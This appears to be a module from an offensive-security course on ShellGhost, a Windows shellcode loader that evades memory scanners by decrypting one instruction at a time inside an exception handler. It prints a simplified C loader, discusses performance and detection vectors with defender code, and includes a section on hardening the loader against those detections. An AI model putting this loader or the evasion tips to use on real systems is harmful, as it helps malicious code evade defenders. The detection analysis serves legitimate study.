Difficulty: Advanced

Module 8: Full Chain, Performance & Detection

The complete execution flow, real-world performance implications, detection vectors, and how ShellGhost compares to other memory evasion techniques.

Module Objective

This final module consolidates everything into a complete end-to-end walkthrough of ShellGhost, analyzes the performance overhead of per-instruction exception handling, catalogs the detection vectors that defenders can use to identify ShellGhost, and compares it against alternative memory evasion techniques like sleep encryption and module stomping. You will leave this module with a complete understanding of ShellGhost's strengths, limitations, and place in the offensive tooling landscape.

1. Complete Execution Flow

Here is the complete ShellGhost chain from program start to shellcode completion, combining every concept from the previous seven modules:

ShellGhost End-to-End Pipeline

1. Preprocess (mapping.py) → 2. Compile (encrypted data + map) → 3. Alloc RW (fill with 0xCC) → 4. Register VEH (First = 1) → 5. CreateThread (entry at end of .text) → 6. BP Loop (per-instruction) → 7. Cleanup (remove VEH, free)

// Complete ShellGhost implementation (simplified, shows architecture)
#include <windows.h>
#include <string.h>

// ============ Types ============
typedef struct _CRYPT_BYTES_QUOTA {
    DWORD rva;
    DWORD quota;
} CRYPT_BYTES_QUOTA;

typedef NTSTATUS (WINAPI *_SystemFunction032)(
    PUNICODE_STRING, PUNICODE_STRING);

// ============ Global State ============
static struct {
    PBYTE exec_base;
    SIZE_T exec_size;
    PBYTE enc_sc;          // Pre-encrypted shellcode (from mapping.py)
    SIZE_T sc_size;
    CRYPT_BYTES_QUOTA *map;
    DWORD num_instr;
    DWORD current_index;
    INT prev_index;
    BYTE key[16];
    USHORT key_len;
    _SystemFunction032 pSF032;
} G;

// ============ VEH Handler ============
LONG CALLBACK Handler(PEXCEPTION_POINTERS ep) {
    PEXCEPTION_RECORD r = ep->ExceptionRecord;
    PCONTEXT c = ep->ContextRecord;
    DWORD old;

    if (r->ExceptionCode == EXCEPTION_BREAKPOINT) {
        // Rip already adjusted by kernel (no -1 needed)
        PBYTE addr = (PBYTE)c->Rip;
        if (addr < G.exec_base ||
            addr >= G.exec_base + G.exec_size)
            return EXCEPTION_CONTINUE_SEARCH;

        // Toggle to RW for writing
        VirtualProtect(G.exec_base, G.exec_size,
                        PAGE_READWRITE, &old);

        // "Re-encrypt" the previous instruction by restoring its 0xCC filler
        if (G.prev_index >= 0) {
            CRYPT_BYTES_QUOTA *prev = &G.map[G.prev_index];
            memset(G.exec_base + prev->rva, 0xCC, prev->quota);
        }

        // Decrypt current instruction via SystemFunction032
        CRYPT_BYTES_QUOTA *curr = &G.map[G.current_index];
        memcpy(G.exec_base + curr->rva,
               G.enc_sc + curr->rva, curr->quota);
        UNICODE_STRING data = {
            (USHORT)curr->quota, (USHORT)curr->quota,
            (PWSTR)(G.exec_base + curr->rva) };
        UNICODE_STRING key = {
            G.key_len, G.key_len, (PWSTR)G.key };
        G.pSF032(&data, &key);

        // Toggle to RX for execution
        VirtualProtect(G.exec_base, G.exec_size,
                        PAGE_EXECUTE_READ, &old);

        G.prev_index = G.current_index;
        G.current_index++;
        return EXCEPTION_CONTINUE_EXECUTION;
    }

    return EXCEPTION_CONTINUE_SEARCH;
}

// ============ Main ============
void ShellGhostRun(
    PBYTE enc_sc, SIZE_T sc_size,       // From mapping.py
    CRYPT_BYTES_QUOTA *map, DWORD n_instr,
    PBYTE key, USHORT key_len
) {
    // 1. Store references
    G.enc_sc = enc_sc;
    G.sc_size = sc_size;
    G.map = map;
    G.num_instr = n_instr;
    memcpy(G.key, key, key_len);
    G.key_len = key_len;
    G.prev_index = -1;
    G.current_index = 0;

    // 2. Resolve SystemFunction032
    G.pSF032 = (_SystemFunction032)GetProcAddress(
        LoadLibraryA("advapi32.dll"), "SystemFunction032");

    // 3. Allocate RW buffer filled with 0xCC
    G.exec_base = (PBYTE)VirtualAlloc(NULL, sc_size,
        MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    memset(G.exec_base, 0xCC, sc_size);
    G.exec_size = sc_size;

    // 4. Register VEH handler
    PVOID h = AddVectoredExceptionHandler(1, Handler);

    // 5. Create thread at end of .text segment
    LPVOID entry = ResolveEndofTextSegment();
    HANDLE hThread = CreateThread(NULL, 0,
        (LPTHREAD_START_ROUTINE)entry, NULL, 0, NULL);
    WaitForSingleObject(hThread, INFINITE);

    // 6. Cleanup
    RemoveVectoredExceptionHandler(h);
    VirtualFree(G.exec_base, 0, MEM_RELEASE);
}

2. Performance Impact Analysis

ShellGhost's per-instruction exception model introduces significant overhead compared to native execution. Understanding the performance cost is essential for assessing when this technique is practical.

Exception Overhead Breakdown

Operation	Approximate Cost	Frequency
Kernel trap (INT3)	~1,000-5,000 cycles	Once per instruction
Context save to KTRAP_FRAME	~500-1,000 cycles	Once per instruction
User-mode dispatch (KiUserExceptionDispatcher)	~2,000-5,000 cycles	Once per instruction
VEH handler lookup + call	~100-500 cycles	Once per instruction
SystemFunction032 decrypt	~50-200 cycles	Once per instruction
VirtualProtect RW↔RX toggle	~1,000-3,000 cycles	Twice per instruction (RX→RW, then RW→RX)
Memory write (re-encrypt + decrypt)	~10-100 cycles	Once per instruction
NtContinue (restore CONTEXT)	~2,000-5,000 cycles	Once per instruction

Total overhead per shellcode instruction: approximately 7,000 to 20,000 CPU cycles (summing the rows above, with the VirtualProtect toggle counted twice, gives about 7,700 to 22,800). A typical instruction executes in 1-5 cycles natively, so ShellGhost imposes a slowdown factor of roughly 1,500x (about 7,700 cycles against 5) to 20,000x (about 20,000 cycles against 1). Note that the one-exception model (breakpoint only, no single-step) incurs approximately half the exception overhead of a two-exception approach.
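The arithmetic behind these totals can be checked with a short sketch. The cycle ranges are copied from the table above and are estimates, not measurements; the struct and function names are hypothetical and exist only for this illustration.

```c
#include <assert.h>
#include <stddef.h>

/* One row of the overhead table: an estimated cycle range and how many
   times the operation occurs per shellcode instruction. */
typedef struct {
    const char   *operation;
    unsigned long min_cycles;
    unsigned long max_cycles;
    unsigned int  times_per_instruction;
} overhead_row;

/* Values taken from the "Exception Overhead Breakdown" table (estimates). */
static const overhead_row OVERHEAD_TABLE[] = {
    { "Kernel trap (INT3)",          1000, 5000, 1 },
    { "Context save to KTRAP_FRAME",  500, 1000, 1 },
    { "User-mode dispatch",          2000, 5000, 1 },
    { "VEH handler lookup + call",    100,  500, 1 },
    { "SystemFunction032 decrypt",     50,  200, 1 },
    { "VirtualProtect toggle",       1000, 3000, 2 },
    { "Memory write",                  10,  100, 1 },
    { "NtContinue",                  2000, 5000, 1 },
};

/* Sum every row into a per-instruction cycle range. */
void overhead_per_instruction(unsigned long *min_total, unsigned long *max_total)
{
    assert(min_total != NULL && max_total != NULL);
    *min_total = 0;
    *max_total = 0;
    for (size_t i = 0; i < sizeof OVERHEAD_TABLE / sizeof OVERHEAD_TABLE[0]; i++) {
        const overhead_row *row = &OVERHEAD_TABLE[i];
        *min_total += row->min_cycles * row->times_per_instruction;
        *max_total += row->max_cycles * row->times_per_instruction;
    }
}

/* Slowdown = overhead cycles divided by native cycles per instruction
   (integer division, so the result is rounded down). */
unsigned long slowdown_factor(unsigned long overhead_cycles, unsigned long native_cycles)
{
    assert(native_cycles > 0);
    return overhead_cycles / native_cycles;
}
```

Summing the rows yields 7,660 and 22,800 cycles. Dividing the low total by 5 native cycles and the high total by 1 gives 1,532x and 22,800x, which is in line with the rounded range quoted in the text.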

Practical Impact

Shellcode Type	Native Execution	ShellGhost Execution	Verdict
Stager (small, network setup)	<1 ms	~50-200 ms	Acceptable for a stager payload
Stageless beacon (~200KB)	~1 ms	~5-30 seconds for initial setup	Noticeable delay but usually tolerable
Continuous C2 loop	Real-time	Significant latency per iteration	ShellGhost is best for initialization, not continuous operation
Compute-heavy shellcode	Varies	Extremely slow	Not suitable for compute-bound payloads
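To relate per-instruction cycle costs to the wall-clock figures in this table, a rough conversion is instructions × cycles per instruction ÷ clock frequency. The sketch below assumes a 3 GHz clock and a 30,000-instruction stager in its usage note; both numbers are illustrative assumptions, not values from ShellGhost, and the function name is hypothetical.

```c
#include <assert.h>

/* Estimated seconds needed to execute `instructions` shellcode instructions
   when each one costs `cycles_per_instruction` cycles on a CPU running at
   `clock_hz` cycles per second. Ignores scheduling, caches, and API calls. */
double estimated_seconds(unsigned long long instructions,
                         unsigned long cycles_per_instruction,
                         double clock_hz)
{
    assert(clock_hz > 0.0);
    return (double)instructions * (double)cycles_per_instruction / clock_hz;
}
```

Under those assumptions, estimated_seconds(30000, 7000, 3e9) is about 0.07 s and estimated_seconds(30000, 20000, 3e9) is about 0.2 s, the same order of magnitude as the stager row.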

Mitigation: Hybrid Approach

ShellGhost is most effective as a stager or initialization mechanism. The shellcode executed under ShellGhost's protection performs the minimum necessary work (resolve APIs, establish initial C2 connection, allocate new memory) and then copies a second-stage payload to a new region for native-speed execution. This way, the most sensitive phase (initial beacon setup, which is the most likely time for a memory scan) is protected, while long-running operations execute at normal speed.

3. Detection Vectors

While ShellGhost defeats memory signature scanning, it introduces several behavioral indicators that defenders can detect:

Detection Vector	Observable Indicator	Detection Method	Difficulty
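VEH Registration	AddVectoredExceptionHandler API call	User-mode API hook on AddVectoredExceptionHandler or ntdll!RtlAddVectoredExceptionHandler (registration happens entirely in user mode, so kernel ETW providers such as Microsoft-Windows-Kernel-Audit-API-Calls do not record it)	Easy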
Excessive Exceptions	Thousands of EXCEPTION_BREAKPOINT per second	Performance counters, ETW exception events, kernel callbacks	Medium
RW/RX Memory Toggling	Frequent VirtualProtect calls toggling between PAGE_READWRITE and PAGE_EXECUTE_READ	API hook on VirtualProtect, ETW memory protection events	Medium
0xCC-Filled Memory	A memory region containing almost entirely 0xCC bytes	Heuristic scan for homogeneous INT3 regions	Medium
VEH Handler List Inspection	Non-standard VEH handlers registered in the process	Walking ntdll!LdrpVectorHandlerList	Medium
Thread Entry Point	Thread with entry point in the .text segment (at null bytes near the end)	Thread creation monitoring, unusual start address analysis	Hard
KiUserExceptionDispatcher Frequency	Extremely high rate of user-mode exception dispatch	Hooking KiUserExceptionDispatcher or monitoring debug events	Medium

4. Detection Deep Dive: VEH Registration Monitoring

// Defender perspective: detecting VEH handler registration
// Method 1: Hook AddVectoredExceptionHandler
// (LogEvent and AlertEvent stand in for the sensor's own logging routines)
typedef PVOID (WINAPI *pAddVEH)(ULONG, PVECTORED_EXCEPTION_HANDLER);
pAddVEH OriginalAddVEH;

PVOID WINAPI HookedAddVEH(ULONG First, PVECTORED_EXCEPTION_HANDLER Handler) {
    // Log the registration
    LogEvent("VEH handler registered: First=%lu, Handler=%p", First, (void *)Handler);

    // Check if the handler address is in a suspicious region.
    // VirtualQuery returns 0 on failure, in which case mbi is not valid.
    MEMORY_BASIC_INFORMATION mbi;
    if (VirtualQuery((LPCVOID)Handler, &mbi, sizeof(mbi)) != 0 &&
        mbi.Type == MEM_PRIVATE && mbi.State == MEM_COMMIT) {
        AlertEvent("VEH handler in private memory (potential shellcode)");
    }

    return OriginalAddVEH(First, Handler);
}

// Method 2: Walk the VEH handler list directly
// (requires knowledge of ntdll internal structures)
// The handler list is at ntdll!LdrpVectorHandlerList

5. Detection Deep Dive: Exception Rate Monitoring

// Defender perspective: detecting excessive exception rates
// Using Windows Performance Counters or ETW

// Normal process: 0-10 exceptions per second
// ShellGhost process: 10,000-100,000+ exceptions per second

// Rate-based detection:
// Event source: sensor-specific (for example, a hook on KiUserExceptionDispatcher).
//   The Microsoft-Windows-Kernel-Audit-API-Calls provider covers a fixed set of
//   kernel API calls and does not report exception dispatch.
// Threshold: Alert if > 1000 exceptions/second sustained

Exception Rate as an IoC

A normal Windows process generates very few exceptions during regular operation. ShellGhost generates one EXCEPTION_BREAKPOINT for every single shellcode instruction. A typical shellcode payload might execute tens of thousands of instructions during initialization alone. This creates an exception rate that is orders of magnitude above normal, making it a strong Indicator of Compromise (IoC) for behavioral detection. Note that ShellGhost's one-exception model generates half the exceptions compared to a two-exception (breakpoint + single-step) approach, but this is still far above baseline.
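The "sustained" part of such a threshold can be sketched as a counter over one-second windows that alerts only after several consecutive windows exceed the limit. This is a minimal, platform-independent illustration: the rate_monitor type and its functions are hypothetical, timestamps are assumed to be monotonic milliseconds supplied by whatever sensor observes the exceptions, and the 1000 per second figure follows the threshold mentioned above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct {
    uint64_t window_start_ms;   /* start of the current one-second window */
    uint32_t count;             /* exceptions seen in the current window */
    uint32_t threshold;         /* per-second count that marks a window as hot */
    uint32_t hot_windows;       /* consecutive hot windows closed so far */
    uint32_t required_windows;  /* hot windows needed before alerting */
} rate_monitor;

void rate_monitor_init(rate_monitor *m, uint32_t threshold, uint32_t required_windows)
{
    assert(m != NULL && required_windows > 0);
    m->window_start_ms = 0;
    m->count = 0;
    m->threshold = threshold;
    m->hot_windows = 0;
    m->required_windows = required_windows;
}

/* Record one exception observed at `now_ms` (must not go backwards).
   Returns 1 once the rate has stayed above the threshold for
   `required_windows` consecutive one-second windows, otherwise 0. */
int rate_monitor_record(rate_monitor *m, uint64_t now_ms)
{
    assert(m != NULL && now_ms >= m->window_start_ms);
    uint64_t elapsed = now_ms - m->window_start_ms;

    if (elapsed >= 1000) {
        /* Close the finished window and extend or break the streak. */
        if (m->count > m->threshold)
            m->hot_windows++;
        else
            m->hot_windows = 0;

        /* A full idle second between events also breaks the streak. */
        if (elapsed >= 2000)
            m->hot_windows = 0;

        m->window_start_ms = now_ms - (elapsed % 1000);
        m->count = 0;
    }

    m->count++;
    return m->hot_windows >= m->required_windows;
}
```

With a threshold of 1000 and three required windows, a stream of 2,000 exceptions per second first triggers at the start of the fourth second, while a process raising a handful of exceptions per second never does.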

6. Comparison with Other Memory Evasion Techniques

Technique	Decryption Surface	Performance	Detection Difficulty	Complexity
Sleep Encryption (Ekko)	Full payload during active phase	Minimal (native speed when active)	Medium (timer objects, VirtualProtect pattern)	Medium
Foliage	Full payload during active phase	Minimal (APC-based sleep obfuscation)	Medium (APC queue monitoring)	Medium-High
Module Stomping	Full payload (but appears backed by DLL)	Native speed	Medium (.text section hash mismatch)	Low-Medium
Page Guard Toggling	One page (4KB)	Moderate (one exception per page)	Medium (VirtualProtect frequency)	Medium
ShellGhost	1 instruction (~1-15 bytes)	Very slow (1 exception + 2 VirtualProtect per instruction)	Medium (exception rate, VEH registration, RW/RX toggling)	High

When to Use ShellGhost

Ideal: When memory scanning is the primary detection concern and the shellcode is small (stagers, position-independent loaders)
Good: As an initialization mechanism that transitions to native execution after setup
Acceptable: When performance is not critical and stealth against memory forensics is paramount
Not ideal: For large payloads, compute-intensive operations, or environments with strong behavioral monitoring

7. Hardening ShellGhost

Several modifications can make ShellGhost more resistant to the detection vectors identified above:

Reducing Observable Indicators

Detection Vector	Hardening Approach
RW/RX toggling frequency	ShellGhost already avoids RWX by toggling between RW and RX. To reduce VirtualProtect call frequency, batch multiple instructions between toggles (increases decryption surface but reduces overhead).
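VEH registration	AddVectoredExceptionHandler forwards to ntdll!RtlAddVectoredExceptionHandler, which runs entirely in user mode; there is no NtAddVectoredExceptionHandler syscall, so a direct-syscall approach does not apply to this call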
0xCC-filled region	Fill unused bytes with random data instead of uniform 0xCC. Use a different single-byte trap instruction.
Exception rate	Add artificial delays between instructions to reduce exception frequency (further reduces performance)
VEH list inspection	Encode the handler pointer manually using the same scheme as RtlEncodePointer

8. Course Summary

What You Have Learned

Module	Topic	Key Concept
1	Memory Scanner Evasion	Full decryption creates a detectable window; minimal decryption surface is the goal
2	Software Breakpoints	INT3 (0xCC) is a 1-byte instruction that generates EXCEPTION_BREAKPOINT (0x80000003)
3	Vectored Exception Handling	VEH handlers run before SEH; AddVectoredExceptionHandler with First=1 gives highest priority
4	The ShellGhost Concept	One-exception cycle: each BREAKPOINT handler re-encrypts previous instruction AND decrypts current one
5	SystemFunction032 & Shellcode Mapping	Python preprocessing generates CRYPT_BYTES_QUOTA maps; SystemFunction032 provides per-instruction RC4
6	VEH Handler Implementation	ContextRecord->Rip used directly (kernel-adjusted); RW/RX toggling via VirtualProtect
7	Background: Trap Flag & Single-Stepping	General x86 knowledge about TF/EXCEPTION_SINGLE_STEP (not used by ShellGhost)
8	Full Chain & Detection	~1,500-20,000x slowdown; detectable via VEH registration, exception rate, RW/RX toggling

The Core Innovation

ShellGhost's innovation is twofold: (1) the shellcode mapping preprocessing pipeline that disassembles shellcode and enables per-instruction independent encryption via SystemFunction032, and (2) the realization that a one-exception cycle using only EXCEPTION_BREAKPOINT (no trap flag) is sufficient for decrypt-execute-reencrypt semantics. Combined with RW/RX memory toggling and thread creation at the .text segment end, lem0nSec created a technique that leaves at most one decrypted instruction in memory at a time, which defeats signature-based memory scanning while avoiding common IoCs like RWX memory and thread entry in private memory. The cost is the behavioral footprint and slowdown described above. This trade-off is compelling for scenarios where stealth matters more than performance, particularly for initial-stage execution.

Knowledge Check

Q1: What is the approximate performance overhead of ShellGhost compared to native shellcode execution?

A) 2-5x slower

B) 10-100x slower

C) 1,500-20,000x slower (due to kernel transition + VirtualProtect per instruction)

D) No measurable difference

Q2: Which detection vector is most straightforward for defenders to monitor?

A) RC4 keystream bias analysis

B) AddVectoredExceptionHandler API call combined with high EXCEPTION_BREAKPOINT rate

C) Scanning for 0xCC bytes in all memory regions

D) Monitoring CPU temperature for exception overhead

Q3: What is the recommended use case for ShellGhost in a real operation?

A) As a stager or initialization mechanism that transitions to native execution after setup

B) For continuous C2 beacon communication

C) For compute-intensive post-exploitation tasks

D) As a replacement for all shellcode loaders
